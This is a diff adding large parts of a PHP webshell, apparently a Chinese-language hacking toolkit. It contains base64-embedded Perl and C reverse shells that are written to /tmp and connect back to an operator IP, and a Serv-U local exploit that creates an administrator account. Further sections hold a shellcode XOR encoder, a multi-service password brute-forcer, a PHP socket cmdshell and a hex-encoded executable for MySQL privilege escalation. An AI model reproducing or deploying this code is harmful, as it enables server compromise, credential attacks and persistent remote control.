+<div class="actall">ִ�з�ʽ <select name="use" >
+<option value="perl">perl</option>
+<option value="c">c</option>
+</select></div>
+<div class="actall"><input type="submit" value="����" style="width:80px;"></div></form>
+END;
+	if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
+	{
+		echo '<div class="actall">';
+		if($_POST['use'] == 'perl')
+		{
+			$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+			"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+			"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+			"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+			"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+			"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+			"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+			echo File_Write('/tmp/yoco_bc',base64_decode($back_connect_pl),'wb') ? '����/tmp/yoco_bc�ɹ�<br>' : '����/tmp/yoco_bcʧ��<br>';
+			$perlpath = Exec_Run('which perl');
+			$perlpath = $perlpath ? chop($perlpath) : 'perl';
+			echo Exec_Run($perlpath.' /tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'ִ������ʧ��';
+		}
+		if($_POST['use'] == 'c')
+		{
+			$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+			"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+			"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+			"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+			"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+			"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+			"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+			"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+			echo File_Write('/tmp/yoco_bc.c',base64_decode($back_connect_c),'wb') ? '����/tmp/yoco_bc.c�ɹ�<br>' : '����/tmp/yoco_bc.cʧ��<br>';
+			$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/yoco.c');
+			echo Exec_Run('/tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'ִ������ʧ��';
+		}
+		echo '<br>����Գ������Ӷ˿� (nc -l -n -v -p '.$_POST['yourport'].') </div>';
+	}
+	return true;
+}
+
+//ServU
+function Servu_l()
+{
+	$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
+print<<<END
+<div class="actall"><a href="?s=l">[ִ������]</a> <a href="?s=l&o=adduser">[�����û�]</a></div>
+<form method="POST">
+	<div class="actall">ServU�˿� <input name="SUPort" type="text" value="43958" style="width:300px"></div>
+	<div class="actall">ServU�û� <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
+	<div class="actall">ServU���� <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
+END;
+if($_GET['o'] == 'adduser')
+{
+print<<<END
+<div class="actall">�ʺ� <input name="user" type="text" value="yoco" style="width:200px">
+���� <input name="password" type="text" value="silic" style="width:200px">
+Ŀ¼ <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
+END;
+}
+else
+{
+print<<<END
+<div class="actall">��Ȩ���� <input name="SUCommand" type="text" value="net user silic silic /add & net localgroup administrators silic /add" style="width:600px"><br>
+<input name="user" type="hidden" value="silic">
+<input name="password" type="hidden" value="silic">
+<input name="part" type="hidden" value="C:\\\\"></div>
+END;
+}
+echo '<div class="actall"><input type="submit" value="ִ��" style="width:80px;"></div></form>';
+	if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
+	{
+		echo '<div class="actall">';
+		$sendbuf = "";
+		$recvbuf = "";
+		$domain  = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
+		$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
+							 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
+							 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
+		$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
+		$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "SITE MAINTENANCE\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = $domain;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = $adduser;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		if(!empty($_POST['SUCommand']))
+		{
+	 		$exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "USER ".$_POST['user']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "PASS ".$_POST['password']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = $deldomain;
+	 		@fputs($sock, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($sock, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		@fclose($exp);
+		}
+		@fclose($sock);
+		echo '</div>';
+	}
+}
+
+//FTP����
+function filecollect($dir,$filelist) {
+   $files = ftp_nlist($conn,$dir); 
+   return $files;
+   }
+function ftp_php(){
+$dir = "";
+$ftphost = isset($_POST['ftphost']) ? $_POST['ftphost'] : '127.0.0.1';
+$ftpuser = isset($_POST['ftpuser']) ? $_POST['ftpuser'] : 'root';
+$ftppass = isset($_POST['ftppass']) ? $_POST['ftppass'] : 'silic123456';
+$ftplist = isset($_POST['list']) ? $_POST['list'] : '';
+$ftpfolder = isset($_POST['ftpfolder']) ? $_POST['ftpfolder'] : '/';
+$ftpfolder = strtr($ftpfolder,"\\","/");
+$files = isset($_POST['readfile']) ? $_POST['readfile'] : '';
+print<<<END
+<div class="actall"><h5>php����ftp���Ӳ���(δ���)</h5></div>
+<form method="POST" name="" action="?s=aa">
+<div class="actall">����:<input type="text" name="ftphost" value="{$ftphost}" style="width:100px">
+��¼��:<input type="text" name="ftpuser" value="{$ftpuser}" style="width:100px">
+����:<input type="text" name="ftppass" value="{$ftppass}" style="width:100px"><br><br>
+<input type="hidden" name="readfile" value="" style="width:200px">
+·��:<input type="text" name="ftpfolder" value="{$ftpfolder}" style="width:200px">
+<input type="hidden" name="list" value="�б�">
+<input class="bt" type="submit" name="�б�" value="list" style="width:40px"><br><br></form></div>
+END;
+if($ftplist == 'list'){
+$conn = @ftp_connect($ftphost) or die("�޷�����");
+    if(@ftp_login($conn,$ftpuser,$ftppass)){
+    $filelists = @ftp_nlist( $conn, $ftpfolder );
+    echo "<pre>";
+    echo "��ǰ�ļ���:<font color='#FF0000'>$ftpfolder</font>:<br>";
+    if(is_array($filelists))
+    {
+    foreach ($filelists as $file)
+    {
+       $file = strtr($file,"\\","/");
+       $size_file =@ftp_size($conn, $file);
+       if ( $size_file == -1)
+           {
+           $a=$a.basename($file)."<br>";
+           }
+       else
+           {
+           $b=$b.basename($file)."				".$size_file."B</br>";
+           }
+    }
+    }
+    echo $a;
+    echo $b;
+    echo "</pre>";
+    }
+    }
+print<<<END
+<form method="POST" name="" action="?s=aa" >
+<div class="actall">�ļ���:<input type="text" name="readfile" value="{$files}" style="width:200px">
+<input type="hidden" name="read" value="��ȡ">
+<input class="bt" type="submit" name="read" value="��ȡ" style="width:40px"><br><br></form></div>
+END;
+$readaction = isset($_POST['read']) ? $_POST['read'] : '';
+if ($readaction == 'read') {
+    $handle = @file_get_contents("ftp://$ftpuser:$ftppass@$ftphost/$files", "r");
+    $handle = htmlspecialchars($handle);
+    $handle = str_replace("\n", "<br>", $handle);
+    echo "<font color='#FF0000'>$files</font>������:<br><br>";
+    echo $handle;
+    }
+print<<<END
+<form method="post" enctype="multipart/form-data" name="" action="?s=aa">
+<div class="actall">�ļ���:<input type="text" name="cdir" value="{$cdir}" style="width:100px">
+<input type="file" name="upload" value="�ϴ�" style="width:200px;height:22px;">
+<input type="hidden" name="upfile" value="�ϴ�">
+<input class="bt" type="submit" name="submit" value="�ϴ�" style="width:40px"></form></div>
+END;
+$upaction = isset($_POST['upfile']) ? $_POST['upfile'] : '' ;    
+if ($upaction == 'upfile') {
+    $cdir = isset($_POST['cdir']) ? $_POST['cdir'] : '/';
+    $conn = @ftp_connect($ftphost) or die("�޷�����");
+    if(@ftp_login($conn,$ftpuser,$ftppass)){
+        @ftp_chdir($conn, $cdir);
+        $res_code = @ftp_put($conn,$_FILES['upload']['name'],$_FILES['upload']['tmp_name'], FTP_BINARY,0);
+        if (empty($res_code)){
+          echo '<font color="#FF67A0">�ϴ�ʧ��</font><br>';
+        }
+        else{
+         echo '<font color="#FF67A0">�ϴ��ɹ�</font><br>';
+        } 
+    }
+}
+print<<<END
+<form method="POST" enctype="multipart/form-data" name="" action="?s=aa">
+<div class="actall">·��:<input type="text" name="downfile" value="{$getfile}" style="width:100px">
+<input type="hidden" name="getfile" value="����">
+<input class="bt" type="submit" name="down" value="����" style="width:40px"></form></div>
+END;
+$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : '';
+$getaction = isset($_POST['getfile']) ? $_POST['getfile'] : '';   
+if ($getaction == 'down' && $getfile !=''){
+function php_ftp_download($filename){   
+global $ftphost,$ftpuser,$ftppass;              
+  $ftp_path = dirname($filename)   .   "/";         
+  $select_file = basename($filename);        
+  $ftp = @ftp_connect($ftphost);        
+  if($ftp){ 
+        if(@ftp_login($ftp, $ftpuser, $ftppass)){        
+        if(@ftp_chdir($ftp,$ftp_path))   {                              
+        $tmpfile = tempnam(getcwd(),"temp");
+        if(ftp_get($ftp,$tmpfile,$select_file,FTP_BINARY)){       
+          ftp_quit($ftp);      
+          header("Content-Type:application/octet-stream");   
+          header("Content-Disposition:attachment;  filename=" . $select_file);   
+          unlink($tmpfile); 
+          exit;   
+          }   
+         }   
+        }   
+      }   
+      ftp_quit($ftp);   
+  }
+php_ftp_download($getfile); 
+}
+}
+
+//shellcodeת��
+function shellcode_decode($Url_String,$Oday_value)
+{
+	$Oday_value = hexdec($Oday_value);
+	$$Url_String = str_replace(" ", "", $Url_String);
+	$SHELL = explode("%u", $Url_String);
+	for($i=0;$i < count($SHELL);$i++)
+	{
+		$Temp = $SHELL[$i];
+		$s_1 = substr($Temp,2);
+		$s_2 = substr($Temp,0,2);
+		$COPY .= $s_1.$s_2;
+	}
+for($n=0; $n < strlen($COPY); $n+=2){$Decode .= pack("C", hexdec(substr($COPY, $n, 2) )^ $Oday_value);}
+return $Decode;
+}
+function shellcode_encode($Url_String,$Oday_value)
+{
+	$Length =strlen($Url_String);
+	$Todec = hexdec($Oday_value);
+	for ($i=0; $i < $Length; $i++)
+	{
+		$Temp = ord($Url_String[$i]);
+		$Hex_Temp = dechex($Temp ^ $Todec);
+		if (hexdec($Hex_Temp) < 16) $Hex_Temp = '0'.$Hex_Temp;
+		$hex .= $Hex_Temp;
+	}
+if ($Length%2) $hex .= $Oday_value.$Oday_value; else $hex .= $Oday_value.$Oday_value.$Oday_value.$Oday_value;
+for ($n=0; $n < strlen($hex); $n+=4)
+{
+	$Temp = substr($hex, $n, 4);
+	$s_1= substr($Temp,2);
+	$s_2= substr($Temp,0,2);
+	$Encode.= '%u'.$s_1.$s_2;
+}
+return $Encode;
+}
+function shellcode_findxor($Url_String)
+{
+	for ($i = 0; $i < 256; $i++)
+	{
+		$shellcode[0] = shellcode_decode($Url_String, dechex($i));
+		if ((strpos ($shellcode[0],'tp:')) || (strpos ($shellcode[0],'url')) || (strpos ($shellcode[0],'exe')))
+		{
+			$shellcode[1] = dechex($i);
+			return $shellcode;
+		}
+	}
+}
+function Shellcode_j()
+{
+	$Oday_value='0';
+	$Shell_Code='http://blackbap.org/hello.exe';
+	$checkeda='checked';
+	$checkedb='';
+if(!empty($_POST['code']))
+{
+	if($_POST['xor'] == 'a' && isset($_POST['number'])){$Oday_value = $_POST['number'];$Shell_Code = shellcode_encode($_POST['code'],$Oday_value);}
+	if($_POST['xor'] == 'b'){$checkeda = '';$checkedb = ' checked';$Shell_Code_Array = shellcode_findxor($_POST['code']);$Shell_Code = $Shell_Code_Array[0];$Oday_value = $Shell_Code_Array[1];}
+	if(!$Oday_value) $Oday_value = '0';
+	if(!$Shell_Code) $Shell_Code = '�Ҳ���shellcode������url';
+	$Shell_Code = htmlspecialchars($Shell_Code);
+}
+print<<<END
+<form method="POST" name="bbform" id="bbform" action="?s=bb">
+<div class="actall">XOR(�ڵ�):<input name="number" value="{$Oday_value}" type="text" style="width:50px"> 
+<input type="radio" name="xor" value="a"{$checkeda}>XORת�� <input type="radio" name="xor" value="b"{$checkedb}>XOR��ת��</div>
+<div class="actall"><textarea name="code" rows="20" cols="110">{$Shell_Code}</textarea></div>
+<div class="actall"><input class="bt" type="submit" value="ִ��"></div>
+</form>
+END;
+return true;
+}
+
+//������ɨ��
+function Crack_k()
+{
+	$MSG_BOX = '�ȴ���Ϣ����......';
+	$ROOT_DIR = File_Mode();
+	$SORTS = explode('/',$ROOT_DIR);
+	array_shift($SORTS);
+	$PASS = join(',',$SORTS);
+//��ϵͳ�ļ��������룬��for����һ�鴿�����ظ����� by:yoco
+for($i = 0;$i < 10;$i++){$n = (string)$i; $PASS .= $n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.$n.',';}
+if((!empty($_POST['address'])) && (!empty($_POST['user'])) && (!empty($_POST['pass'])))
+{
+	$SORTPASS = explode(',',$_POST['pass']);
+	$connect = false;
+	$MSG_BOX = 'not found';
+	for($k = 0;$k < count($SORTPASS);$k++)
+	{
+		if($_POST['class'] == 'mysql') $connect = @mysql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k]));
+		if($_POST['class'] == 'mssql') $connect = @mssql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k]));
+		if($_POST['class'] == 'pgsql') $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop($SORTPASS[$k])}");
+		if($_POST['class'] == 'oracle') $connect = @oci_connect($_POST['user'],chop($SORTPASS[$k]),$_POST['address']);
+		if($_POST['class'] == 'ftp'){$Ftp_conn = @ftp_connect($_POST['address'],'21');$connect = @ftp_login($Ftp_conn,$_POST['user'],chop($SORTPASS[$k]));}
+		if($_POST['class'] == 'ssh'){$ssh_conn = @ssh2_connect($_POST['address'],'22');$connect = @ssh2_auth_password($ssh_conn,$_POST['user'],chop($SORTPASS[$k]));}
+		if($connect) $MSG_BOX = '[project: '.$_POST['class'].'] [ip: '.$_POST['address'].'] [user: '.$_POST['user'].'] [pass: '.$SORTPASS[$k].']';
+	}
+}
+print<<<END
+<form method="POST" name="ccform" id="ccform" action="?s=cc">
+<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
+<div class="actall">����<input type="text" name="address" value="localhost" style="width:300px"></div>
+<div class="actall">�˻�<input type="text" name="user" value="root" style="width:300px"></div>
+<div class="actall">����<br><textarea name="pass" rows="20" cols="110">root,123456,123123,123321,admin,admin888,admin@admin,root@root,qwer123,5201314,iloveyou,fuckyou,kissme,520520,5845201314,a123456,a123456789,{$PASS}administrator</textarea></div>
+<div class="actall">��ʽ<input type="radio" name="class" value="mysql" checked>Mysql <input type="radio" name="class" value="mssql" checked>mssql <input type="radio" name="class" value="pgsql" checked>Pgsql <input type="radio" name="class" value="oracle" checked>Oracle <input type="radio" name="class" value="ftp">FTP <input type="radio" name="class" value="ssh" checked>SSH</div>
+<div class="actall"><input class="bt" type="submit" value="��ʼ"></div></form>
+END;
+return true;
+}
+
+
+//php socket����Windows����
+function phpsocket()
+{
+	@set_time_limit(0);
+	$system=strtoupper(substr(PHP_OS, 0, 3));
+if(!extension_loaded('sockets'))
+{
+	if ($system == 'WIN') {
+		@dl('php_sockets.dll') or die("Can't load socket");
+	}else{
+		@dl('sockets.so') or die("Can't load socket");
+	}
+}
+if(isset($_POST['host']) && isset($_POST['port']))
+{
+	$host = $_POST['host'];
+	$port = $_POST['port'];
+}else{	
+print<<<eof
+<div class="actall"><h5>php socketִ��cmdshell�������ӣ�����������ΪWinϵͳ<br>php_sockets��������Ϊopen<br>����ͨ��phpinfo()�����鿴�Ƿ�����<br>��ҪäĿ���ӣ�������ɷ�������������Դ�ľ������غ��</h5></div>
+<form method=post action="?s=dd">
+<div class="actall">Host:<input type=text name=host value=""><br>�˿�:<input type=text name=port value="1120"><br><br>
+<input type="radio" name=info value="linux" checked>Linux <input type="radio" name=info value="win">Windows <input class="bt" type=submit name=submit value="����">
+</form>
+eof;
+}
+if($system=="WIN")
+{
+	$env=array('path' => 'c:\\windows\\system32');
+}else{
+	$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
+}
+$descriptorspec = array(
+	0 => array("pipe","r"),
+	1 => array("pipe","w"),
+	2 => array("pipe","w"),
+);
+$host=gethostbyname($host);
+$proto=getprotobyname("tcp");
+if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0)
+{
+die("Socket����ʧ��");
+}
+if(($ret=socket_connect($sock,$host,$port))<0)
+{
+die("����ʧ��");
+}else{
+$message="----------------------PHP��������--------------------\n";
+socket_write($sock,$message,strlen($message));
+$cwd=str_replace('\\','/',dirname(__FILE__));
+while($cmd=socket_read($sock,65535,$proto))
+{
+if(trim(strtolower($cmd))=="exit")
+{
+socket_write($sock,"Bye\n");
+exit;
+}else{
+$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
+if (is_resource($process)) {
+	fwrite($pipes[0], $cmd);
+	fclose($pipes[0]);
+	$msg=stream_get_contents($pipes[1]);
+	socket_write($sock,$msg,strlen($msg));
+	fclose($pipes[1]);
+	$msg=stream_get_contents($pipes[2]);
+	socket_write($sock,$msg,strlen($msg));
+	$return_value = proc_close($process);
+}
+}
+}
+}
+}
+//mysql��Ȩ
+function get_code(){
+return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E327325A00438D7DA883CE2D656B0763CE457537E59B512FD8B7C1028B8B8596504522D9BE1B6144418D4DA885C977DD1696139C2E06249C238D472834160750D28954283B70800CF2C67526537547C84B6CC025CF070D048CFFFEDF5EBC8549E4200866E4516A28AE11DB6E61BC52F88D2072229D489AB3985D2C1D8B35781C88D11B302A6C37DF5968311659FFFF1151BE82B96D42D6FC84FED51052D985CD06A5091CEBC5BA94506052022C069E0F3981C511788FA404FCF68450228B75087CC0807E09060A4B775B71A85F8B5E0C20D469D9D115CEF92011C8B80D124CB6177EA98AB6E00FC1E0028BC803C604C468141ADF02CC33C98A7DBFB566FBEF5E4CC1E102058D14018955E0803A4D4F586F8F818BB9AA01CC8BF2E266F3A7ED0CF26C164102C0159D0542D875477205B04C2C3908C10D00DA6E0D67EF1968D007001034E90B8795BC59C82DED1533F607B80774C03FFB9009C183C206298A023C2167DF7FE9743C843B1B3C0A741788843530421B46D889846744EBDB7FB907CABBFF6F29B6B53C33D2F3A6753B88954C0BB918D962C860784DB34C76739038C0B10B6C68E803C59378271EEB254A1D8E236534B0301BB135728144C60F4F9400D7493C77C7030B5E382E81D8BB7F1A837C2410027513060405750C5B6464046B5F23C357084F179213C888140525F1ECA263810C5456C9134CD8C9C22CBD4FE485DBCEE499566BF6CFE0FA8BCB2BCE490C0804904BB80768042700E0FE397221F724434558E0FE8108D87B96002F8BFB1B2A2327837CD98BFACBCB5073BCC8855098E0FE8D6FBFAC03B7B10DCC63DC0DAF234B21D18DC47AF02AFA7A568F638FA2C0EB0C0354AD46F2C505EED48821B01A60A081C4112684C3CFF4425689FF3B77D77857040CB911280D108D7C2418F3AB8D4C243B0D069B6C1451AB343101BA0B041B0111E5724E64F06650720D553D8755FD04BA917466380E6E8D542408D731F62D925266181108435C5C8F4F4A761850514F9481106A5CDFBFEACC4044076C1589B424809674C67652DD247C03788C5FB65E56B87B49BCBFF0FF255B3CCCCC8D87D4E1674755E7F0FF42DF86C00D5F613C5D6C7904F74104868B23B8065423740F795CEFDCD7B7A5108902B863C33E1210506AFE5C908E7F40F864FF35A900198E1AB52529582FDDD5B4BFC0ED742E3B932474FA34768B0CB38959BD2DB50A02C304B394751268F7DBBFEDBD2DB37D0EAAFF5408EBC3648F0543236C7286EA8C1A648B9C8184FF83DF7904687510E3520C3951087505CF4D05BBFB5351BB1E18EB0A082489DFDCB7B64B02439D6B0C595BFCEF56433230069F0BF758433030F7A5FA